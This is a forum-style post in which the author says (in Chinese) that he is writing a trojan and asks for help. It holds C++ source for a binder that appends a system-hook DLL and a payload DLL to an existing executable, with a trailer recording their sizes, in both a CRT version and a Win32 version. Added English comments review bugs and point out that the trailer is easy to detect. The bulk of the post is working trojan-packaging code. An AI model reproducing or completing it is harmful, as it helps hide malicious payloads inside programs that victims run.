小弟想做个木马程序,以下是部分代码,请GGJJ们指导指导,不胜感激!!
#include "stdafx.h"
#include <stdio.h>
#include <io.h>
#include "..\\Include\\DataStruct.h"
// Pointer type for the hook-installing export of the hook DLL; it receives the
// host EXE name. Nothing in the visible part of this file calls through it.
typedef BOOL (* LPINSTALLHOOKEX)(LPCSTR lpcExeName);
// Host EXE file name. Note the fixed 51-byte size: GetModuleName() /
// GetModuleNameEx() below copy a path component of up to MAX_PATH bytes into
// whatever buffer they are given, with no length argument to stop them.
CHAR g_ExeName[51];
// Hook DLL file name (same 51-byte limit).
CHAR g_HookName[51];
// Payload DLL file name (same 51-byte limit).
CHAR g_CockName[51];
// Copies the base name of the running module's path (everything after the
// last '\\') into buf.
//
// buf: caller-supplied, NUL-terminated on success. No capacity is passed, so
//      the buffer must be able to hold up to MAX_PATH bytes; the 51-byte
//      globals above are not large enough for an arbitrary file name.
// On GetModuleFileName() failure buf is left completely untouched.
void GetModuleName(LPTSTR buf)
{
CHAR path[MAX_PATH];
if (GetModuleFileName(::GetModuleHandle(NULL), path, MAX_PATH))
{
// 92 is '\\'. strrchr() returns NULL when the path contains no backslash,
// and the following line would then read p[1] through a null pointer.
LPTSTR p = strrchr(path, 92);
strcpy(buf, &p[1]);
// No-op: strcat() stops at the first NUL of its source, which is byte 0,
// and strcpy() above has already terminated buf.
strcat(buf, "\0");
}
}
// Variant of GetModuleName() written with the "n" string functions; same
// contract (base name of the running module's path into buf, buf untouched on
// failure). The bounds passed are the SOURCE length, not buf's capacity, so
// this offers no more protection against overrunning buf than GetModuleName().
void GetModuleNameEx(LPTSTR buf)
{
CHAR path[MAX_PATH];
if (GetModuleFileName(::GetModuleHandle(NULL), path, MAX_PATH))
{
// 92 is '\\'; p is NULL (and p[1] an invalid read) if no backslash exists.
LPTSTR p = strrchr(path, 92);
// Copies exactly strlen(p + 1) bytes, i.e. without the terminating NUL.
strncpy(buf, &p[1], strlen(p + 1));
// Effectively a no-op: strncat() appends zero bytes from "\0" and then writes
// a NUL at the first NUL it finds in buf — the position that already held a
// NUL. It does NOT terminate the bytes copied above; that only works out if
// buf already had a NUL immediately after them (e.g. a zero-initialised
// global that has not previously held a longer name).
strncat(buf, "\0", 1);
}
}
// Binder (CRT version): appends the two DLL images to the end of the EXE file,
// followed by a FILEDIS trailer describing them. Returns 1 on success, 0 on
// any failure.
//
// Resulting on-disk layout (from the writes below):
//   [original EXE bytes][hook DLL bytes][payload DLL bytes][FILEDIS trailer]
// The trailer starts with the constant FILEIDENTIFIER string and sits at a
// fixed distance (sizeof(FILEDIS)) from end-of-file — an overlay artifact that
// is straightforward to recognise when scanning a file. FILEDIS and
// FILEIDENTIFIER come from DataStruct.h (not shown); sizeof(FILEDIS) is
// whatever that header's declaration and the compiler's packing produce.
//
// lpProgFile: path of the EXE to append to (must already exist; "ab" never
//             creates anything the loader would run as an EXE).
// lpHookFile: path of the hook DLL to embed.
// lpCockFile: path of the payload DLL to embed.
//
// Review notes, not fixed here:
//  - Every early "return 0" leaks whatever FILE* handles and new[] buffers were
//    acquired before it; only the success path closes and frees.
//  - strcpy() into the fixed-size FILEDIS name fields has no length check.
//  - fread()/fwrite() return size_t and are stored in a LONG, then compared
//    against LONG sizes (signed/unsigned mix); filelength() is the MSVC CRT
//    function from <io.h>.
BYTE UniteFile(LPCSTR lpProgFile, LPCSTR lpHookFile, LPCSTR lpCockFile)
{
FILE *fpProg = NULL, *fpHook = NULL, *fpCock = NULL;
FILEDIS FileDis;
LONG lProg = 0, lHook = 0, lCock = 0, number = 0;
CHAR *cBufHook = NULL, *cBufCock = NULL;
memset(&FileDis, 0, sizeof(FILEDIS));
// Record the identifier and the three file names in the trailer.
strcpy(FileDis.FileIdentifier, FILEIDENTIFIER);
strcpy(FileDis.ProgName, lpProgFile);
strcpy(FileDis.HookDLLName, lpHookFile);
strcpy(FileDis.CockDLLName, lpCockFile);
// "Already split" flag starts cleared (memset above did this as well).
FileDis.IsFileReduced = 0;
// Open the files; bail out on the first failure (leaking earlier handles).
// "ab" = append mode: every fwrite() goes to end-of-file regardless of fseek().
fpProg = fopen(lpProgFile, "ab");
if (fpProg == NULL)
{
return 0;
}
fpHook = fopen(lpHookFile, "rb");
if (fpHook == NULL)
{
return 0;
}
fpCock = fopen(lpCockFile, "rb");
if (fpCock == NULL)
{
return 0;
}
// Rewind before measuring; in append mode this affects reads only.
if (fseek(fpProg, 0L, SEEK_SET) != 0)
{
return 0;
}
// Size of the EXE.
lProg = filelength(fileno(fpProg));
// Size of the system-hook DLL.
lHook = filelength(fileno(fpHook));
// Size of the payload DLL.
lCock = filelength(fileno(fpCock));
// Store the sizes in the trailer so the file can later be taken apart again.
FileDis.ProgSize = lProg;
FileDis.HookDLLSize = lHook;
FileDis.CockDLLSize = lCock;
// Whole-file buffers for the two DLLs (+1 byte that is never used by the
// binary copy). filelength() returning -1 on error is not checked.
cBufHook = new CHAR[lHook + 1];
cBufCock = new CHAR[lCock + 1];
// Seek to the end of the EXE; redundant in append mode, but its failure is
// treated as fatal.
if (fseek(fpProg, lProg, SEEK_SET) != 0)
{
return 0;
}
// Read the entire hook DLL; a short read is a failure.
number = fread(cBufHook, sizeof(CHAR), lHook, fpHook);
if (number < lHook)
{
return 0;
}
// Read the entire payload DLL; a short read is a failure.
number = fread(cBufCock, sizeof(CHAR), lCock, fpCock);
if (number < lCock)
{
return 0;
}
// Append the hook DLL image after the EXE.
number = fwrite(cBufHook, sizeof(CHAR), lHook, fpProg);
if (number < lHook)
{
return 0;
}
// Append the payload DLL image.
number = fwrite(cBufCock, sizeof(CHAR), lCock, fpProg);
if (number < lCock)
{
return 0;
}
// Append the raw FILEDIS trailer as the last sizeof(FILEDIS) bytes of the file.
number = fwrite(&FileDis, sizeof(FILEDIS), 1, fpProg);
if (number < 1)
{
return 0;
}
// Success path only: close the files ...
fclose(fpProg);
fclose(fpHook);
fclose(fpCock);
// ... and free the buffers.
delete[] cBufHook;
delete[] cBufCock;
return 1;
}
// Binder (Win32 API version): same job and same output layout as UniteFile() —
// [EXE][hook DLL][payload DLL][FILEDIS trailer] — using CreateFile/ReadFile/
// WriteFile instead of the CRT. Returns TRUE on success, FALSE on failure.
//
// lpProgFile: path of the EXE to append to (OPEN_EXISTING: must already exist).
// lpHookFile: path of the hook DLL to embed.
// lpCockFile: path of the payload DLL to embed.
//
// Review notes, not fixed here:
//  - Every early "return FALSE" leaks the HANDLEs and new[] buffers acquired so
//    far; only the success path releases them.
//  - strncpy() with strlen(source) as the count never writes a terminator; the
//    fields are only NUL-terminated because of the memset() below, and a name
//    of field-length or longer runs into the neighbouring field.
//  - dwNumber (bytes actually transferred) is never compared with the size
//    requested, so short reads/writes pass as success.
//  - GetFileSize() is called with a NULL high-DWORD pointer (sizes >= 4 GiB are
//    truncated) and its INVALID_FILE_SIZE failure value is not checked; in
//    that case dwHook + 1 / dwCock + 1 wraps to 0 in DWORD arithmetic.
BOOL UniteFileEx(LPCSTR lpProgFile, LPCSTR lpHookFile, LPCSTR lpCockFile)
{
HANDLE hProg = NULL, hHook = NULL, hCock = NULL;
FILEDIS FileDis;
DWORD dwProg = 0, dwHook = 0, dwCock = 0, dwNumber = 0;
CHAR *cBufHook = NULL, *cBufCock = NULL;
memset(&FileDis, 0, sizeof(FILEDIS));
// Record the identifier and the three file names in the trailer (see the
// strncpy() note above regarding termination).
strncpy(FileDis.FileIdentifier, FILEIDENTIFIER, strlen(FILEIDENTIFIER));
strncpy(FileDis.ProgName, lpProgFile, strlen(lpProgFile));
strncpy(FileDis.HookDLLName, lpHookFile, strlen(lpHookFile));
strncpy(FileDis.CockDLLName, lpCockFile, strlen(lpCockFile));
// "Already split" flag starts cleared (memset above did this as well).
FileDis.IsFileReduced = 0;
// Open the files; bail out on the first failure (leaking earlier handles).
// CreateFile() reports failure as INVALID_HANDLE_VALUE, which is what is
// tested — the NULL initialisers above are never the failure value.
hProg = CreateFile(lpProgFile, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL,
OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hProg == INVALID_HANDLE_VALUE)
{
return FALSE;
}
hHook = CreateFile(lpHookFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hHook == INVALID_HANDLE_VALUE)
{
return FALSE;
}
hCock = CreateFile(lpCockFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hCock == INVALID_HANDLE_VALUE)
{
return FALSE;
}
// Size of the EXE (low 32 bits only).
dwProg = GetFileSize(hProg, NULL);
// Size of the system-hook DLL.
dwHook = GetFileSize(hHook, NULL);
// Size of the payload DLL.
dwCock = GetFileSize(hCock, NULL);
// Store the sizes in the trailer so the file can later be taken apart again.
FileDis.ProgSize = dwProg;
FileDis.HookDLLSize = dwHook;
FileDis.CockDLLSize = dwCock;
// Whole-file buffers for the two DLLs (+1 byte that the binary copy never uses).
cBufHook = new CHAR[dwHook + 1];
cBufCock = new CHAR[dwCock + 1];
// Move the EXE's file pointer to end-of-file so the writes below append.
// 0xFFFFFFFF is INVALID_SET_FILE_POINTER.
if (SetFilePointer(hProg, 0, NULL, FILE_END) == 0xFFFFFFFF)
{
return FALSE;
}
// Read the entire hook DLL (dwNumber not validated against dwHook).
if (!ReadFile(hHook, cBufHook, dwHook, &dwNumber, NULL))
{
return FALSE;
}
// Read the entire payload DLL (dwNumber not validated against dwCock).
if (!ReadFile(hCock, cBufCock, dwCock, &dwNumber, NULL))
{
return FALSE;
}
// Append the hook DLL image after the EXE.
if (!WriteFile(hProg, cBufHook, dwHook, &dwNumber, NULL))
{
return FALSE;
}
// Append the payload DLL image.
if (!WriteFile(hProg, cBufCock, dwCock, &dwNumber, NULL))
{
return FALSE;
}
// Append the raw FILEDIS trailer as the last sizeof(FILEDIS) bytes of the file.
if (!WriteFile(hProg, &FileDis, sizeof(FILEDIS), &dwNumber, NULL))
{
return FALSE;
}
// Success path only: close the handles ...
CloseHandle(hProg);
CloseHandle(hHook);
CloseHandle(hCock);
// ... and free the buffers.
delete[] cBufHook;
delete[] cBufCock;
return TRUE;
}